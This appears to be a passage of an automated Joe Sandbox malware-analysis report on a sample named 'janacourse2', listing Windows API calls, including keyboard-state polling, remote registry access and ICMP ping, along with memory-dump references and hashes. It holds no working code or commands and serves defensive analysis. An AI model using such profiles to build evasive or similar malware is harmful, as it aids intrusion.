                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0101EA5D
                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0101EA73
                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101EA84
                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0101EA96
                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0101EAA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: SendString$_wcslen
                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                            • Opcode ID: 3be55fac658cdf458ce7c172ebe534a306bcb6d99b62185193fa905eab7bfe2a
                                                                                                            • Instruction ID: 6767a29330fd9ead0b54abb2502d828e945b6a6b000e608ea55fb31d5086e04c
                                                                                                            • Opcode Fuzzy Hash: 3be55fac658cdf458ce7c172ebe534a306bcb6d99b62185193fa905eab7bfe2a
                                                                                                            • Instruction Fuzzy Hash: 5111E331A8026979E720A3A7DC4ADFF7EBCEBC1F00F440429B842A6081EEA51905C9B0
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 01015CE2
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 01015CFB
                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 01015D59
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 01015D69
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 01015D7B
                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 01015DCF
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 01015DDD
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 01015DEF
                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 01015E31
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 01015E44
                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 01015E5A
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 01015E67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3096461208-0
                                                                                                            • Opcode ID: 6a8395f211012ff490f901d4a3970e94226c34a6adf3f03c293142b7b1fcec4c
                                                                                                            • Instruction ID: f5fcf6b151477c091a3b9a05449170bd26e9c7c6364389e2f53e6e227d6b3fab
                                                                                                            • Opcode Fuzzy Hash: 6a8395f211012ff490f901d4a3970e94226c34a6adf3f03c293142b7b1fcec4c
                                                                                                            • Instruction Fuzzy Hash: 55511CB4B00205AFDB18DF68CE89AAEBBF5FB89300F508169F955E7294D775AD00CB50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC8BE8,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 00FC8FC5
                                                                                                            • DestroyWindow.USER32(?), ref: 00FC8C81
                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 00FC8D1B
                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 01006973
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 010069A1
                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 010069B8
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FC8BBA,00000000), ref: 010069D4
                                                                                                            • DeleteObject.GDI32(00000000), ref: 010069E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 641708696-0
                                                                                                            • Opcode ID: 7ab3213d8a16c64b5c8f604fc3c34f538bfe73bd30b8415fcb112ee62cc265fa
                                                                                                            • Instruction ID: f168de3497e9d3d258fc2dbc652c589944f3122488471a0bf1f0654e457e3ca2
                                                                                                            • Opcode Fuzzy Hash: 7ab3213d8a16c64b5c8f604fc3c34f538bfe73bd30b8415fcb112ee62cc265fa
                                                                                                            • Instruction Fuzzy Hash: EC618931506602DFEB36DF18DB4AB6977F2FF41352F14455CE0C286994CB3AA892EB90
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9944: GetWindowLongW.USER32(?,000000EB), ref: 00FC9952
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00FC9862
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorLongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 259745315-0
                                                                                                            • Opcode ID: 61a826c2e93bb0fcd80412a77e8d8d275921c2e663f3a8fb017f6696efa52286
                                                                                                            • Instruction ID: 749bdb73eb1802dca3f6f05c13c2812a74dc0d172a0024b028670b36942aa436
                                                                                                            • Opcode Fuzzy Hash: 61a826c2e93bb0fcd80412a77e8d8d275921c2e663f3a8fb017f6696efa52286
                                                                                                            • Instruction Fuzzy Hash: BC413531504640AFEB314F389A89FB93BA5FB07331F544249FAE2871E1C7B69842EB10
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00FFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 01019717
                                                                                                            • LoadStringW.USER32(00000000,?,00FFF7F8,00000001), ref: 01019720
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00FFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 01019742
                                                                                                            • LoadStringW.USER32(00000000,?,00FFF7F8,00000001), ref: 01019745
                                                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 01019866
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                            • API String ID: 747408836-2268648507
                                                                                                            • Opcode ID: 4c4c2dded8831ada303748c6f5c51660212ece35a6e6e57f4b70dc5e28ab3872
                                                                                                            • Instruction ID: d8b8e26d54bbc0402b87c42ddc18c42487c59a4eade9d7fdf12734ab0c4225ed
                                                                                                            • Opcode Fuzzy Hash: 4c4c2dded8831ada303748c6f5c51660212ece35a6e6e57f4b70dc5e28ab3872
                                                                                                            • Instruction Fuzzy Hash: 1B418E7280420AABDB04EBE1CE92DEEB779AF14304F540025F60172096EB796F48DF60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010107A2
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010107BE
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010107DA
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01010804
                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0101082C
                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01010837
                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101083C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                            • API String ID: 323675364-22481851
                                                                                                            • Opcode ID: 79d383d82d86e687c17f52f18570dffeb38b0d85371a308565fbf2c56d928e93
                                                                                                            • Instruction ID: 9eafbc7cb1b762f5424b174b7f1a98048391dadef0171a6f0bfefeafdb16ae05
                                                                                                            • Opcode Fuzzy Hash: 79d383d82d86e687c17f52f18570dffeb38b0d85371a308565fbf2c56d928e93
                                                                                                            • Instruction Fuzzy Hash: 20414672C00228ABDF21EBA5DC85CEEB7B8BF04340B444169F981A7155EB399A44DFA0
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 01033C5C
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01033C8A
                                                                                                            • CoUninitialize.OLE32 ref: 01033C94
                                                                                                            • _wcslen.LIBCMT ref: 01033D2D
                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 01033DB1
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 01033ED5
                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 01033F0E
                                                                                                            • CoGetObject.OLE32(?,00000000,0104FB98,?), ref: 01033F2D
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 01033F40
                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01033FC4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01033FD8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 429561992-0
                                                                                                            • Opcode ID: a73e65d80eb157bed77e4f0044ace232e172586b1f716f4524502542a261d381
                                                                                                            • Instruction ID: 9b79e729b0a72f6c293053e31b9eff424417b3bd437ecaaed07699c2fd539351
                                                                                                            • Opcode Fuzzy Hash: a73e65d80eb157bed77e4f0044ace232e172586b1f716f4524502542a261d381
                                                                                                            • Instruction Fuzzy Hash: 15C130B1608205AFD700DF68C98496BBBE9FFC9748F00495DF98A9B250DB31ED05CB62
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01027AF3
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 01027B8F
                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 01027BA3
                                                                                                            • CoCreateInstance.OLE32(0104FD08,00000000,00000001,01076E6C,?), ref: 01027BEF
                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 01027C74
                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 01027CCC
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 01027D57
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 01027D7A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 01027D81
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 01027DD6
                                                                                                            • CoUninitialize.OLE32 ref: 01027DDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2762341140-0
                                                                                                            • Opcode ID: f78ce7a39b13f1a88736f06bddc9cad4371aad281463cc264e501a17b090bc38
                                                                                                            • Instruction ID: 130a4c421a298687c8f3bc3b71746e08d91dfa941b142d470b49b57c5af58be6
                                                                                                            • Opcode Fuzzy Hash: f78ce7a39b13f1a88736f06bddc9cad4371aad281463cc264e501a17b090bc38
                                                                                                            • Instruction Fuzzy Hash: 3AC15A75A00119AFDB10DFA4C984DAEBBF9FF48304B148099E95ADB261DB35ED41CF90
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01045504
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01045515
                                                                                                            • CharNextW.USER32(00000158), ref: 01045544
                                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01045585
                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0104559B
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010455AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CharNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1350042424-0
                                                                                                            • Opcode ID: d5e9dbba1298d340e55499dc7edec87fc48e05251f1203dca0489d19ccb6fab5
                                                                                                            • Instruction ID: c1812c1f21db25d5de79156116ff270b87f8f7a2ff096b1c1af1afeb10483791
                                                                                                            • Opcode Fuzzy Hash: d5e9dbba1298d340e55499dc7edec87fc48e05251f1203dca0489d19ccb6fab5
                                                                                                            • Instruction Fuzzy Hash: E361B4F4904209AFEF209F54CDC49FE7BB9EF0A724F008165FAA59B280D7759A41CB60
                                                                                                            APIs
                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0100FAAF
                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0100FB08
                                                                                                            • VariantInit.OLEAUT32(?), ref: 0100FB1A
                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0100FB3A
                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0100FB8D
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0100FBA1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 0100FBB6
                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0100FBC3
                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0100FBCC
                                                                                                            • VariantClear.OLEAUT32(?), ref: 0100FBDE
                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0100FBE9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706829360-0
                                                                                                            • Opcode ID: 55b9c58969ef0bb6115a652c3c31d6ea3e948f39b37748343c3ee0605afe8ab6
                                                                                                            • Instruction ID: 0fb7250ec9d79f920c610c1dda6d305b7b43c31d270a36220388b26203e2e684
                                                                                                            • Opcode Fuzzy Hash: 55b9c58969ef0bb6115a652c3c31d6ea3e948f39b37748343c3ee0605afe8ab6
                                                                                                            • Instruction Fuzzy Hash: 6D419374A0021ADFEB11DF68CA949EEBBB9FF48344F008055E985A7250CB35E945DFA0
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?), ref: 01019CA1
                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 01019D22
                                                                                                            • GetKeyState.USER32(000000A0), ref: 01019D3D
                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 01019D57
                                                                                                            • GetKeyState.USER32(000000A1), ref: 01019D6C
                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 01019D84
                                                                                                            • GetKeyState.USER32(00000011), ref: 01019D96
                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 01019DAE
                                                                                                            • GetKeyState.USER32(00000012), ref: 01019DC0
                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 01019DD8
                                                                                                            • GetKeyState.USER32(0000005B), ref: 01019DEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$Async$Keyboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 541375521-0
                                                                                                            • Opcode ID: e85e5f3924b5e8b33e3e1c7b323ce8604fad385ab3448b50f29f7937e5c9be41
                                                                                                            • Instruction ID: 97c50702794176a24cc2477290094bbeda338ab6110f1063bf3855ca78200e98
                                                                                                            • Opcode Fuzzy Hash: e85e5f3924b5e8b33e3e1c7b323ce8604fad385ab3448b50f29f7937e5c9be41
                                                                                                            • Instruction Fuzzy Hash: 1C41E5346047C96AFFB29668C5643B5BEE06B01308F4880DEDAC6565C7DBAD91C8C7A2
                                                                                                            APIs
                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 010305BC
                                                                                                            • inet_addr.WSOCK32(?), ref: 0103061C
                                                                                                            • gethostbyname.WSOCK32(?), ref: 01030628
                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 01030636
                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 010306C6
                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 010306E5
                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 010307B9
                                                                                                            • WSACleanup.WSOCK32 ref: 010307BF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                            • String ID: Ping
                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                            • Opcode ID: edfc4932968243185b3e8c2ca29bd447d87aaa2766d114e93b0a98d1be133ab0
                                                                                                            • Instruction ID: 92aadd0b4a5f84c0bb2fec145d83339d26804eff1dd95bc6fd5746a3e48379d1
                                                                                                            • Opcode Fuzzy Hash: edfc4932968243185b3e8c2ca29bd447d87aaa2766d114e93b0a98d1be133ab0
                                                                                                            • Instruction Fuzzy Hash: 5691C3749052019FE321CF19C989F1ABBE4BF84318F048599F5AA8B7A6C735EC45CF91
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
